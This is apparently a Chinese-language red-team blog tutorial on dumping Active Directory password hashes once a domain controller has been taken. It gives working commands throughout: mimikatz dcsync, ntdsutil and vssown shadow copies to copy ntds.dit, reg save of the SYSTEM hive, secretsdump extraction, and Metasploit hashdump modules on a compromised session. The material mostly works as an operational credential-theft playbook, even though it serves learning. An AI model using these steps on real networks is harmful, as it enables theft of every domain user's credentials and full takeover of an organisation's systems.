大家还记得内网渗透的初衷吗??? 找到域馆,拿下域控!! 拿下了域控就是拿下了整个域!!
但是大家知道拿下域环境之后应该怎么操作吗(灵魂拷问)???
那么下面,开始我们今天的内容 NTDS.DIT文件!!
data:image/s3,"s3://crabby-images/f2ad2/f2ad28da80428cf81e5b3e2cb80bcccd3a92dc6a" alt=""
目录
1.NTDS文件
想要拿下整个域,我们先离不开这个文件!!
首先,当我们拿下域控之后,我们首先会hashdump!!!
data:image/s3,"s3://crabby-images/a99fe/a99feac05978289c84347f8aff35d79ad2376efb" alt=""
然后你就会发现,这也根本没有krbtgt的ntlm哈希啊!!!!
但是我们众所周知,krbtgt是KDC上的一个账号,拿下域控,就能拿到krbtgt的ntlm哈希值!!所以我们就能知道,域内的所有机器的密码根本不在域控的SAM文件里!!
而是在我们今天的主角,NTDI文件中
data:image/s3,"s3://crabby-images/0cfa9/0cfa931371e2edda16e1590ccd0df6c795ac0d09" alt=""
我们在我们的域控上(只有域控)才能看见这样的一个文件夹
data:image/s3,"s3://crabby-images/be41e/be41e6122035581146624dc6ece42ea78625de1d" alt=""
我们在其文件夹中,能看见这样的一个文件!
data:image/s3,"s3://crabby-images/9545f/9545f66c05dc610a78011074f03bb6804da11457" alt=""
而这个里面,就有域内的所有的用户的密码信息(红队能拿到这个就成功了)
当然了,这个文件和SAM文件一样,不允洗复制,不允洗查看,更不允洗修改
data:image/s3,"s3://crabby-images/1ae44/1ae44002976ac8fc222f9aa6657765c0f53a9df1" alt=""
2.Ntds.dit的在线读取
在线读取的话,如果人家域内有很多的用户,就很有可能会卡死,甚至直接宕机(所以你得小心的一点,不然影响到了别人的正常的业务那可就不好了!!)
1.Mimikatz的在线读取
对于mimikatz我就不多说了,这个强大的神器,无论走到哪都是这么无敌!!!
bash
mimikatz lsadump::dcsync /domain:域名 /all /csv
对于普通的域内机器,肯定是拿不到的
data:image/s3,"s3://crabby-images/8719a/8719a5495250954ceea754bd97303f6a15bd5fe9" alt=""
但是对于域控,我们确实可以直接拿到的
data:image/s3,"s3://crabby-images/0ba66/0ba667394bf302b111ceba76683a0991ede86397" alt=""
2.QuarksPwDump在线读取
这个也是一个可以在线读取的工具,不过需要你先将nitdis文件转存出来(这个后面再讲)
bash
shell QuarksPwDump.exe --dump-hash-domain --ntds-file ntdis.dit
data:image/s3,"s3://crabby-images/c7c89/c7c8936905f9b6ae6d4e891c19f3e0dd15222bc4" alt=""
3.使用secretsdump直接读取
网上是用的py文件,我就直接用的exe了
data:image/s3,"s3://crabby-images/eaec7/eaec7091516e7b585835f186648006cd394cead9" alt=""
3.Ntds.dit的离线读取
1.转存ntds文件
相比于在线读取,这个倒不会出现什么卡死的情况,但是人家域控不出网,就意味着你要挂多层代理,传输肯定受到影响!!! 所以你们自行斟酌哪个好!!!
1.使用ntdsutil进行卷影拷贝
这个是Windows自带的,我们先复制到桌面(或者直接传上去使用)
data:image/s3,"s3://crabby-images/4b960/4b9608dc69b56e855b0448f36c15d6106ac8574c" alt=""
然后就是做卷影了(其实就是copy一份)
Kotlin
ntdsutil.exe snapshot "activate instance ntds" create q q
data:image/s3,"s3://crabby-images/7d28a/7d28ae0952d297971a0ddc8926f2077510450c8c" alt=""
然后就去挂载
Kotlin
ntdsutil.exe snapshot "mount {刚才让你记住的东西}" q q
data:image/s3,"s3://crabby-images/2d6ec/2d6ec1e4e4bb72aa71c7eab4adedeca7128a5155" alt=""
这时候我们就能在C盘下看见一个快照
data:image/s3,"s3://crabby-images/8cb59/8cb59cdc0b9f1a935d46d04160db350c114f323c" alt=""
然后我们可以把他复制出来
bash
copy C:\$SNAP_202405051816_VOLUMEC$\Windows\NTDS\ntds.dit C:\
这样,ntds文件就被复制出来了
data:image/s3,"s3://crabby-images/135e4/135e48310f2ae233a4fed8f3d5b747d05c7e59c5" alt=""
2.Vssown快照提取
首先,这个vssown不是微软自带的,你可以去下载一下,然后传上去
第一步先启动卷影复制服务
bash
shell cscript vssown.vbs /start
data:image/s3,"s3://crabby-images/c2b9d/c2b9de2565875902104c7a3497561ba85b301282" alt=""
然后就是去创建一个卷影副本
bash
cscript vssown.vbs /create c
data:image/s3,"s3://crabby-images/95c66/95c66570798f87bf6b591f7cfb979a54fc761238" alt=""
接着再去list一下
bash
cscript vssown.vbs /list
记得去复制一下上面的那个 device object
data:image/s3,"s3://crabby-images/5db7d/5db7d00ae6f2f925a320e637f947d1e9b777b59b" alt=""
最后就是copy了
bash
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\ntds.dit C:\Users
至此,我们就拿到了它的ntds.dit文件了!!!
data:image/s3,"s3://crabby-images/eaa70/eaa702ec2ac178320f7d2e0e22e1d668575c17d2" alt=""
2.读取Ntds.dit文件
在读取之前,我们首先要导出system的一个key!!!
bash
shell reg save hklm\system C:\system.hive
data:image/s3,"s3://crabby-images/6c806/6c8064a90e97e0cb48c4bb65c72a25a019072585" alt=""
然后我们把他下载下来
data:image/s3,"s3://crabby-images/f04f1/f04f1bf0482e53065120ab7a1acf098be9295651" alt=""
data:image/s3,"s3://crabby-images/af6c3/af6c37856fd83fa3706a6ae37f9d55a80849e7bc" alt=""
这玩意可能会有点大,不过没事,要等等(如果网络环境差的话那就难崩了)
1.secretsdump读取
我们可以用impacket工具包里面的secretsdump这个py脚本获取
bash
python secretsdump.py -system hive文件的路径 -ntds ntds.dit的文件路径 LOCAL
能成功获取的到
data:image/s3,"s3://crabby-images/0a633/0a633e89a83beb1610ff61981d632cf5bfdea0ca" alt=""
2.Ntdsdump获取
这个方法我是失败了,可能是工具的原因(难崩)
data:image/s3,"s3://crabby-images/e9f64/e9f64a4a5bb5621d62d618f272c840647f253b96" alt=""
那我们还是用secretsdump吧!!!
4.Kali-Linux进攻性读取
1.直接dumphash
当我们给目标上了马之后,我们可以先看一下权限
data:image/s3,"s3://crabby-images/72b62/72b62bb72a2b2a867b0370c9d73e41e3fcfd168c" alt=""
如果是过了UAC的管理员的话,就可以直接hashdump啦!!
data:image/s3,"s3://crabby-images/dd1d3/dd1d374cfba6f67cb88ebe11a9000d2d94e91aab" alt=""
2.smart_hashdump模块
这个是msf的一个模块(不过我感觉在有hashdump的模块下这个多此一举)
bash
use post/windows/gather/smart_hashdump
然后查看回我们刚才会话的session
bash
sessions -i
data:image/s3,"s3://crabby-images/894be/894be75e63c2629868f0b94770958c04bf5ff9bc" alt=""
然后填上sessionid
bash
set session 1
这个看起来会更加的酷炫一点!!!
data:image/s3,"s3://crabby-images/bf1c3/bf1c31669583e104c772961239844e0139cd0b46" alt=""
3.dump下来ntds文件
这个就不在细说,有点类似于横向!!
data:image/s3,"s3://crabby-images/aebf2/aebf274a77a981cc16f664b2274f63c63228a7b8" alt=""